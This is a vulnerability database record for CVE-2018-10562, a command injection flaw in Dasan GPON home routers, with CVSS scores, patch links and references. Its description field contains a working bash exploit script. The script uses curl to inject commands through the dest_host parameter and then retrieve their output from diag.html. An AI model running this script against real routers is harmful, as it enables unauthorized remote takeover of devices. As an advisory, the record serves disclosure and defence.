Details of VAR-201805-0263

ID

VAR-201805-0263

CVE

CVE-2018-10562

TITLE

Dasan GPON home routers Command injection vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2018-004886

DESCRIPTION

An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output. Dasan GPON home routers Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could use the vulnerability to execute a command and retrieve the output by sending a diag_action=ping request with the \342\200\230dest_host\342\200\231 parameter to GponForm/diag_FormURI. Multiple Dasan GPON Routers is prone to an authentication-bypass vulnerability and a command-injection vulnerability. An attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device. #!/bin/bash echo "[+] Sending the Commanda| " # We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null echo "[+] Waitinga|." sleep 3 echo "[+] Retrieving the ouputa|." curl -k $1/diag.html?images/ 2>/dev/null | grep adiag_result = a | sed -e as/\\n/\n/ga

Trust: 2.7

sources: NVD: CVE-2018-10562 // JVNDB: JVNDB-2018-004886 // CNVD: CNVD-2018-09165 // BID: 107053 // VULHUB: VHN-120334 // VULMON: CVE-2018-10562 // PACKETSTORM: 147482

IOT TAXONOMY

category:

['Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2018-09165

AFFECTED PRODUCTS

vendor:	dasannetworks	model:	gpon router	scope:	eq	version:	-	Trust: 1.6
vendor:	dasan	model:	gpon routers	scope:	-	version:	-	Trust: 0.8
vendor:	dasan	model:	networks gpon	scope:	-	version:	-	Trust: 0.6
vendor:	dasan	model:	networks gpon router	scope:	eq	version:	0	Trust: 0.3

sources: CNVD: CNVD-2018-09165 // BID: 107053 // JVNDB: JVNDB-2018-004886 // CNNVD: CNNVD-201805-188 // NVD: CVE-2018-10562

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2018-10562
value:	CRITICAL
Trust: 1.0
NVD:	CVE-2018-10562
value:	CRITICAL
Trust: 0.8
CNVD:	CNVD-2018-09165
value:	HIGH
Trust: 0.6
CNNVD:	CNNVD-201805-188
value:	CRITICAL
Trust: 0.6
VULHUB:	VHN-120334
value:	HIGH
Trust: 0.1
VULMON:	CVE-2018-10562
value:	HIGH
Trust: 0.1

nvd@nist.gov:	CVE-2018-10562
severity:	HIGH
baseScore:	7.5
vectorString:	AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	10.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.9
CNVD:	CNVD-2018-09165
severity:	HIGH
baseScore:	7.5
vectorString:	AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	10.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
VULHUB:	VHN-120334
severity:	HIGH
baseScore:	7.5
vectorString:	AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	10.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

nvd@nist.gov:	CVE-2018-10562
baseSeverity:	CRITICAL
baseScore:	9.8
vectorString:	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	HIGH
exploitabilityScore:	3.9
impactScore:	5.9
version:	3.0
Trust: 1.8

sources: CNVD: CNVD-2018-09165 // VULHUB: VHN-120334 // VULMON: CVE-2018-10562 // JVNDB: JVNDB-2018-004886 // CNNVD: CNNVD-201805-188 // NVD: CVE-2018-10562

PROBLEMTYPE DATA

problemtype:	CWE-78	Trust: 1.1
problemtype:	CWE-77	Trust: 0.9

sources: VULHUB: VHN-120334 // JVNDB: JVNDB-2018-004886 // NVD: CVE-2018-10562

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201805-188

TYPE

operating system commend injection

Trust: 0.6

sources: CNNVD: CNNVD-201805-188

CONFIGURATIONS

sources: JVNDB: JVNDB-2018-004886

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-120334 // VULMON: CVE-2018-10562

PATCH

title:	Top Page	url:	http://www.dasannetworks.com/en/	Trust: 0.8
title:	GPon router remote command execution vulnerability patch	url:	https://www.cnvd.org.cn/patchInfo/show/128481	Trust: 0.6
title:	Dasan GPON Home router command injection vulnerability fixes	url:	http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79884	Trust: 0.6
title:	Pingpon-Exploit	url:	https://github.com/649/Pingpon-Exploit	Trust: 0.1
title:	GPON_RCE	url:	https://github.com/c0ld1/GPON_RCE	Trust: 0.1
title:	GPON	url:	https://github.com/Truongnn92/GPON	Trust: 0.1
title:	GPON	url:	https://github.com/f3d0x0/GPON	Trust: 0.1
title:	GPON-LOADER	url:	https://github.com/Choudai/GPON-LOADER	Trust: 0.1
title:	GPON	url:	https://github.com/manyunya/GPON	Trust: 0.1
title:	GPON	url:	https://github.com/ethicalhackeragnidhra/GPON	Trust: 0.1
title:	GPON-home-routers-Exploit	url:	https://github.com/vhackor/GPON-home-routers-Exploit	Trust: 0.1
title:	CVE-2018-10562	url:	https://github.com/ATpiu/CVE-2018-10562	Trust: 0.1
title:	awesome-network-stuff	url:	https://github.com/alphaSeclab/awesome-network-stuff	Trust: 0.1
title:	awesome-network-stuff	url:	https://github.com/aniksarakash/awesome-network-stuff	Trust: 0.1
title:	MS17-010	url:	https://github.com/oneplus-x/MS17-010	Trust: 0.1
title:	Exp101tsArchiv30thers	url:	https://github.com/nu11secur1ty/Exp101tsArchiv30thers	Trust: 0.1
title:	CVE-POC	url:	https://github.com/0xT11/CVE-POC	Trust: 0.1
title:	awesome-cve-poc_qazbnm456	url:	https://github.com/xbl3/awesome-cve-poc_qazbnm456	Trust: 0.1
title:	PoC-in-GitHub	url:	https://github.com/nomi-sec/PoC-in-GitHub	Trust: 0.1
title:	Threatpost	url:	https://threatpost.com/d-link-iot-tor-gafgyt-variant/164529/	Trust: 0.1
title:	Threatpost	url:	https://threatpost.com/inside-hoaxcalls-botnet-success-failure/156107/	Trust: 0.1
title:	BleepingComputer	url:	https://www.bleepingcomputer.com/news/security/gpon-routers-attacked-with-new-zero-day/	Trust: 0.1
title:	Threatpost	url:	https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/	Trust: 0.1

sources: CNVD: CNVD-2018-09165 // VULMON: CVE-2018-10562 // JVNDB: JVNDB-2018-004886 // CNNVD: CNNVD-201805-188

EXTERNAL IDS

db:	NVD	id:	CVE-2018-10562	Trust: 3.6
db:	EXPLOIT-DB	id:	44576	Trust: 2.6
db:	BID	id:	107053	Trust: 2.1
db:	JVNDB	id:	JVNDB-2018-004886	Trust: 0.8
db:	CNNVD	id:	CNNVD-201805-188	Trust: 0.7
db:	CNVD	id:	CNVD-2018-09165	Trust: 0.6
db:	VULHUB	id:	VHN-120334	Trust: 0.1
db:	VULMON	id:	CVE-2018-10562	Trust: 0.1
db:	PACKETSTORM	id:	147482	Trust: 0.1

sources: CNVD: CNVD-2018-09165 // VULHUB: VHN-120334 // VULMON: CVE-2018-10562 // BID: 107053 // JVNDB: JVNDB-2018-004886 // PACKETSTORM: 147482 // CNNVD: CNNVD-201805-188 // NVD: CVE-2018-10562

REFERENCES

url:	http://www.securityfocus.com/bid/107053	Trust: 3.1
url:	https://www.exploit-db.com/exploits/44576/	Trust: 2.7
url:	https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/	Trust: 2.1
url:	https://nvd.nist.gov/vuln/detail/cve-2018-10562	Trust: 0.9
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10562	Trust: 0.8
url:	https://nvd.nist.gov/vuln/detail/cve-2018-10652	Trust: 0.6
url:	http://www.dasannetworks.com/en/	Trust: 0.3
url:	https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-603	Trust: 0.3
url:	https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-604	Trust: 0.3
url:	https://cwe.mitre.org/data/definitions/78.html	Trust: 0.1
url:	https://github.com/649/pingpon-exploit	Trust: 0.1
url:	https://nvd.nist.gov	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2018-10561	Trust: 0.1

CREDITS

None

Trust: 0.9

sources: BID: 107053 // CNNVD: CNNVD-201805-188

SOURCES

db:	CNVD	id:	CNVD-2018-09165
db:	VULHUB	id:	VHN-120334
db:	VULMON	id:	CVE-2018-10562
db:	BID	id:	107053
db:	JVNDB	id:	JVNDB-2018-004886
db:	PACKETSTORM	id:	147482
db:	CNNVD	id:	CNNVD-201805-188
db:	NVD	id:	CVE-2018-10562

LAST UPDATE DATE

2024-08-14T15:13:10.912000+00:00

SOURCES UPDATE DATE

db:	CNVD	id:	CNVD-2018-09165	date:	2019-01-23T00:00:00
db:	VULHUB	id:	VHN-120334	date:	2019-10-03T00:00:00
db:	VULMON	id:	CVE-2018-10562	date:	2019-10-03T00:00:00
db:	BID	id:	107053	date:	2019-02-18T00:00:00
db:	JVNDB	id:	JVNDB-2018-004886	date:	2018-06-29T00:00:00
db:	CNNVD	id:	CNNVD-201805-188	date:	2019-10-23T00:00:00
db:	NVD	id:	CVE-2018-10562	date:	2019-10-03T00:03:26.223

SOURCES RELEASE DATE

db:	CNVD	id:	CNVD-2018-09165	date:	2018-05-09T00:00:00
db:	VULHUB	id:	VHN-120334	date:	2018-05-04T00:00:00
db:	VULMON	id:	CVE-2018-10562	date:	2018-05-04T00:00:00
db:	BID	id:	107053	date:	2019-02-18T00:00:00
db:	JVNDB	id:	JVNDB-2018-004886	date:	2018-06-29T00:00:00
db:	PACKETSTORM	id:	147482	date:	2018-05-04T00:32:22
db:	CNNVD	id:	CNNVD-201805-188	date:	2018-05-07T00:00:00
db:	NVD	id:	CVE-2018-10562	date:	2018-05-04T03:29:00.287